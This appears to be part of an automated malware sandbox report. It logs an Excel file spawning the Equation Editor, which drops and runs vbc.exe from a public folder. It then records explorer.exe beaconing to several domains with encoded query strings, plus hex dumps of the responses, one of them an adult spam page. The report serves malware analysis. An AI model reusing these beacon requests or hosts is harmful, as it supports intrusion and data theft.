                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 67 61 74 6f 72 62 6f 74 74 6f 6d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6c 65 66 74 3a 33 39 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 78 78 78 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 20 33 39 37 70 78 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 20 61 75 74
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 - PAGE NOT FOUND</title>... Add Slide Outs --><script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="/cgi-sys/js/simple-expand.min.js"></script> <style type="text/css"> body{padding:0;margin:0;font-family:helvetica;} #container{margin:20px auto;width:868px;} #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;} #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;} #container #mid404 #gatorbottom{position:relative;left:39px;float:left;} #container #mid404 #xxx{float:left;padding:40px 397px 10px; margin: auto aut
                                                  Jan 13, 2022 20:23:11.771794081 CET504INData Raw: 6f 20 2d 31 30 70 78 20 61 75 74 6f 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 63 6f 6e 74 65 6e 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 69 64
                                                  Data Ascii: o -10px auto} #container #mid404 #content{float:left;text-align:center;width:868px;} #container #mid404 #content #errorcode{font-size:30px;font-weight:800;} #container #mid404 #content #banner{margin:20px 0 0 ;}
                                                  Jan 13, 2022 20:23:11.771842003 CET506INData Raw: 6f 6e 20 68 33 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 7d 0a 09 09 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 63 6f 6e 74 65 6e 74 20 23 61 63 63 6f 72 64 69 6f 6e 20 68 34 20 7b 66 6f 6e 74 2d 77 65 69
                                                  Data Ascii: on h3 {font-weight: bold;} #container #mid404 #content #accordion h4 {font-weight: bold; font-style: italic; text-align: left;} .content {display:none;} .first {color: #ff6600;} .second {color: #3b5998;} .third {color: #198
                                                  Jan 13, 2022 20:23:11.771881104 CET507INData Raw: 2f 2f 69 70 2f 7e 75 73 65 72 6e 61 6d 65 2f 29 20 61 6e 64 20 67 65 74 20 74 68 69 73 20 65 72 72 6f 72 2c 20 74 68 65 72 65 20 6d 61 79 62 65 20 61 20 70 72 6f 62 6c 65 6d 20 77 69 74 68 20 74 68 65 20 72 75 6c 65 20 73 65 74 20 73 74 6f 72 65
                                                  Data Ascii: //ip/~username/) and get this error, there maybe a problem with the rule set stored in an .htaccess file. You can try renaming that file to .htaccess-backup and refreshing the site to see if that resolves the issue.</p><p>It is also
                                                  Jan 13, 2022 20:23:11.771924973 CET508INData Raw: 65 20 69 6e 20 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 61 64 64 6f 6e 64 6f 6d 61 69 6e 2e 63 6f 6d 2f 65 78 61 6d 70 6c 65 2f 45 78 61 6d 70 6c 65 2f 20 61 6e 64 20 74 68 65 20 6e 61 6d 65 73 20 61 72 65 20 63 61 73 65 2d 73 65 6e 73 69 74 69 76 65
                                                  Data Ascii: e in public_html/addondomain.com/example/Example/ and the names are case-sensitive.</p><h4><u>Broken Image</u></h4><p>When you have a missing image on your site you may see a box on your page with with a red <span style="colo
                                                  Jan 13, 2022 20:23:11.771965027 CET510INData Raw: 20 61 20 6e 65 77 20 74 68 65 6d 65 20 68 61 73 20 62 65 65 6e 20 61 63 74 69 76 61 74 65 64 20 6f 72 20 77 68 65 6e 20 74 68 65 20 72 65 77 72 69 74 65 20 72 75 6c 65 73 20 69 6e 20 74 68 65 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 68 61
                                                  Data Ascii: a new theme has been activated or when the rewrite rules in the .htaccess file have been altered.</p><p>When you encounter a 404 error in WordPress, you have two options for correcting it.</p><h4><u>Option 1: Correct the Pe
                                                  Jan 13, 2022 20:23:11.772003889 CET511INData Raw: 09 09 09 09 09 09 09 52 65 77 72 69 74 65 45 6e 67 69 6e 65 20 4f 6e 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 52 65 77 72 69 74 65 42 61 73 65 20 2f 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 52 65 77 72 69 74 65 52 75 6c 65 20 5e 69 6e 64
                                                  Data Ascii: RewriteEngine On<br>RewriteBase /<br>RewriteRule ^index.php$ - [L]<br>RewriteCond %{REQUEST_FILENAME} !-f<br>RewriteCond %{REQUEST_FILENAME} !-d<br>RewriteRule . /index.php [L]<br>
                                                  Jan 13, 2022 20:23:11.772044897 CET513INData Raw: 63 68 61 6e 67 65 64 2e 28 59 6f 75 20 6d 61 79 20 6e 65 65 64 20 74 6f 20 63 6f 6e 73 75 6c 74 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 6e 64 20 72 65 73 6f 75 72 63 65 73 20 66 6f 72 20 74 68 61 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e
                                                  Data Ascii: changed.(You may need to consult other articles and resources for that information.)</p><h4><u>There are Many Ways to Edit a .htaccess File</u></h4><ul><li>Edit the file on your computer and upload it to the serve
                                                  Jan 13, 2022 20:23:11.772088051 CET514INData Raw: 73 74 20 6f 66 20 66 69 6c 65 73 2e 20 59 6f 75 20 6d 61 79 20 6e 65 65 64 20 74 6f 20 73 63 72 6f 6c 6c 20 74 6f 20 66 69 6e 64 20 69 74 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 3c 2f 6f 6c 3e 0a 09 09 09 09 09 09 09 09 3c 68 34 3e 3c 75 3e
                                                  Data Ascii: st of files. You may need to scroll to find it.</li></ol><h4><u>To Edit the .htaccess File</u></h4><ol><li>Right click on the <strong>.htaccess file</strong> and click&nbsp;<strong>Code Edit</strong> from t
                                                  Jan 13, 2022 20:23:11.772109985 CET514INData Raw: 20 7d 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: }); </script></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  6192.168.2.2249174221.121.143.14880C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:23:17.360008955 CET515OUTGET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1
                                                  Host: www.integratedheartspsychology.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:17.639343023 CET516INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Thu, 13 Jan 2022 19:23:17 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name chang
                                                  Jan 13, 2022 20:23:17.639389992 CET516INData Raw: 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74
                                                  Data Ascii: ed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  7192.168.2.224917523.80.120.9380C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:23:23.008996964 CET517OUTGET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1
                                                  Host: www.bjbwx114.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:23.537935019 CET519INHTTP/1.1 200 OK
                                                  Date: Thu, 13 Jan 2022 19:23:13 GMT
                                                  Content-Length: 1795
                                                  Content-Type: text/html
                                                  Server: nginx
                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 c1 d9 e2 a2 d0 cb ce bb bf c6 bc bc d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 30 31 32 37 3b 26 23 32 39 33 37 38 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 35 37 30 3b 26 23 32 39 32 33 32 3b 26 23 32 30 38 34 30 3b 26 23 33 36 38 30 37 3b 26 23 33 31 32 34 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 36 35 3b 26 23 38 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 31 35 36 30 3b 26 23 33 30 35 32 38 3b 26 23 32 32 39 30 32 3b 26 23 32 37 37 30 30 3b 26 23 32 30 35 37 30 3b 26 23 33 30 35 32 38 3b 26 23 32 39 32 33 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 30 31 32 37 3b 26 23 32 39 33 37 38 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 35 37 30 3b 26 23 32 39 32 33 32 3b 26 23 32 30 38 34 30 3b 26 23 33 36 38 30 37 3b 26 23 33 31 32 34 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 36 35 3b 26 23 38 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 31 35 36 30 3b 26 23 33 30 35 32 38 3b 26 23 32 32 39 30 32 3b 26 23 32 37 37 30 30 3b 26 23 32 30 35 37 30 3b 26 23 33 30 35 32 38 3b 26 23 32 39 32 33 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 35 37 30 3b 26 23 32 39 32 33 32 3b 26 23 32 30 38 34 30 3b 26 23 33 36 38 30 37 3b 26 23 33 31 32 34 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 36 35 3b 26 23 38 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 31 35 36 30 3b 26 23 33 30 35 32 38 3b 26 23 32 32 39 30 32 3b 26 23 32 37 37 30 30 3b 26 23 32 30 35 37 30 3b 26 23 33 30 35 32 38 3b 26 23 32 39 32 33 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 30 31 32 37
                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#26085;&#26412;&#30127;&#29378;&#39640;&#28526;&#88;&#88;&#88;&#88;&#35270;&#39057;,&#20570;&#29232;&#20840;&#36807;&#31243;&#20813;&#36153;&#26080;&#30721;&#30340;&#35270;&#39057;,&#65;&#86;&#26080;&#30721;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21560;&#30528;&#22902;&#27700;&#20570;&#30528;&#29233;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;</title><meta name="keywords" content="&#26085;&#26412;&#30127;&#29378;&#39640;&#28526;&#88;&#88;&#88;&#88;&#35270;&#39057;,&#20570;&#29232;&#20840;&#36807;&#31243;&#20813;&#36153;&#26080;&#30721;&#30340;&#35270;&#39057;,&#65;&#86;&#26080;&#30721;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21560;&#30528;&#22902;&#27700;&#20570;&#30528;&#29233;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;" /><meta name="description" content="&#20570;&#29232;&#20840;&#36807;&#31243;&#20813;&#36153;&#26080;&#30721;&#30340;&#35270;&#39057;,&#65;&#86;&#26080;&#30721;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21560;&#30528;&#22902;&#27700;&#20570;&#30528;&#29233;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;,&#26085;&#26412;&#30127
                                                  Jan 13, 2022 20:23:23.537996054 CET519INData Raw: 3b 26 23 32 39 33 37 38 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 35 31 30 34 3b 26 23 32 30 31 35 34 3b 26 23 32 31
                                                  Data Ascii: ;&#29378;&#39640;&#28526;&#88;&#88;&#88;&#88;&#35270;&#39057;,&#25104;&#20154;&#21320;&#22812;&#31119;&#21033;&#35270;&#39057;&#32593;&#22336;,&#30007;&#22899;&#35064;&#20307;&#20570;&#29232;&#22270;&#29255;,&#23567;&#20044;&#37233;&#40657;&#3


                                                  Code Manipulations

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  Analysis Process: EXCEL.EXE PID: 2032 Parent PID: 596

                                                  General

                                                  Start time:20:21:22
                                                  Start date:13/01/2022
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                  Imagebase:0x13ffd0000
                                                  File size:28253536 bytes
                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: EQNEDT32.EXE PID: 2016 Parent PID: 596

                                                  General

                                                  Start time:20:21:46
                                                  Start date:13/01/2022
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: vbc.exe PID: 2540 Parent PID: 2016

                                                  General

                                                  Start time:20:21:49
                                                  Start date:13/01/2022
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\Public\vbc.exe"
                                                  Imagebase:0x11a0000
                                                  File size:417792 bytes
                                                  MD5 hash:83AC585E99B527EEB278702F8F711568
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmp, Author: Joe Security
